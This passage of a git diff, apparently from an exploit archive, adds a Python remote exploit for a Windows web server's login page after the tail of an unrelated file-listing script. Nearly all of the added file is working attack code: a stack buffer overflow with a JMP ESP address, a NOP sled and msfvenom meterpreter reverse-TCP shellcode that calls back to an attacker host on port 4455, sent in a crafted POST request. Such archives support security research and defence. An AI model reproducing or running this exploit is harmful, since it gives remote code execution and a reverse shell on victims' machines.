+		while i < len(data):	
+			i, filename = processChunk(i, data)         # Get file name
+			i, directory = processChunk(i, data)        # Get file path
+			i += 8 # Skip the FFFFFFFFFFFFFFFF
+	    		f.write(directory + '\\' + filename + '\n') # Write to output file
+	
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/platforms/windows/remote/43145.py b/platforms/windows/remote/43145.py
new file mode 100755
index 000000000..fa12018dd
--- /dev/null
+++ b/platforms/windows/remote/43145.py
@@ -0,0 +1,72 @@
+# Tested on Windows 10 (x86)
+# The application requires to have the web server enabled. 
+# Exploit for older version: https://www.exploit-db.com/exploits/40832/
+
+#!/usr/bin/python
+ 
+import socket,os,time,struct,argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument('--host', required=True)
+args = parser.parse_args()
+
+host = args.host
+port = 80
+
+# root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.116.166 LPORT=4455 -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
+shellcode =  ""
+shellcode += "\xba\xb6\x9f\x39\x88\xd9\xf7\xd9\x74\x24\xf4\x5e\x31"
+shellcode += "\xc9\xb1\x54\x83\xee\xfc\x31\x56\x0f\x03\x56\xb9\x7d"
+shellcode += "\xcc\x74\x2d\x03\x2f\x85\xad\x64\xb9\x60\x9c\xa4\xdd"
+shellcode += "\xe1\x8e\x14\x95\xa4\x22\xde\xfb\x5c\xb1\x92\xd3\x53"
+shellcode += "\x72\x18\x02\x5d\x83\x31\x76\xfc\x07\x48\xab\xde\x36"
+shellcode += "\x83\xbe\x1f\x7f\xfe\x33\x4d\x28\x74\xe1\x62\x5d\xc0"
+shellcode += "\x3a\x08\x2d\xc4\x3a\xed\xe5\xe7\x6b\xa0\x7e\xbe\xab"
+shellcode += "\x42\x53\xca\xe5\x5c\xb0\xf7\xbc\xd7\x02\x83\x3e\x3e"
+shellcode += "\x5b\x6c\xec\x7f\x54\x9f\xec\xb8\x52\x40\x9b\xb0\xa1"
+shellcode += "\xfd\x9c\x06\xd8\xd9\x29\x9d\x7a\xa9\x8a\x79\x7b\x7e"
+shellcode += "\x4c\x09\x77\xcb\x1a\x55\x9b\xca\xcf\xed\xa7\x47\xee"
+shellcode += "\x21\x2e\x13\xd5\xe5\x6b\xc7\x74\xbf\xd1\xa6\x89\xdf"
+shellcode += "\xba\x17\x2c\xab\x56\x43\x5d\xf6\x3e\xa0\x6c\x09\xbe"
+shellcode += "\xae\xe7\x7a\x8c\x71\x5c\x15\xbc\xfa\x7a\xe2\xc3\xd0"
+shellcode += "\x3b\x7c\x3a\xdb\x3b\x54\xf8\x8f\x6b\xce\x29\xb0\xe7"
+shellcode += "\x0e\xd6\x65\x9d\x04\x40\x2a\x72\x6d\x36\x5a\x71\x8d"
+shellcode += "\x27\xfc\xfc\x6b\x17\x52\xaf\x23\xd7\x02\x0f\x94\xbf"
+shellcode += "\x48\x80\xcb\xdf\x72\x4a\x64\x75\x9d\x23\xdc\xe1\x04"
+shellcode += "\x6e\x96\x90\xc9\xa4\xd2\x92\x42\x4d\x22\x5c\xa3\x24"
+shellcode += "\x30\x88\xd2\xc6\xc8\x48\x7f\xc7\xa2\x4c\x29\x90\x5a"
+shellcode += "\x4e\x0c\xd6\xc4\xb1\x7b\x64\x02\x4d\xfa\x5d\x78\x7b"
+shellcode += "\x68\xe2\x16\x83\x7c\xe2\xe6\xd5\x16\xe2\x8e\x81\x42"
+shellcode += "\xb1\xab\xce\x5e\xa5\x67\x5a\x61\x9c\xd4\xcd\x09\x22"
+shellcode += "\x02\x39\x96\xdd\x61\x3a\xd1\x22\xf7\x1e\x7a\x4b\x07"
+shellcode += "\x1e\x7a\x8b\x6d\x9e\x2a\xe3\x7a\xb1\xc5\xc3\x83\x18"
+shellcode += "\x8e\x4b\x09\xcc\x7c\xed\x0e\xc5\x21\xb3\x0f\xe9\xf9"
+shellcode += "\xa2\x81\x0e\xfe\xca\x63\x33\x28\xf3\x11\x74\xe8\x40"
+shellcode += "\x29\xcf\x4d\xe0\xa0\x2f\xc1\xf2\xe0"
+
+buffer  = "\x41" * 780
+buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
+buffer += "\x90" * 12
+buffer += shellcode
+buffer += "\x90" * (10000 - len(buffer))
+
+evil =  "POST /login HTTP/1.1\r\n"
+evil += "Host: 192.168.228.140\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "username=" + buffer
+evil += "&password=" + buffer + "\r\n"
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect((host,port))
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
\ No newline at end of file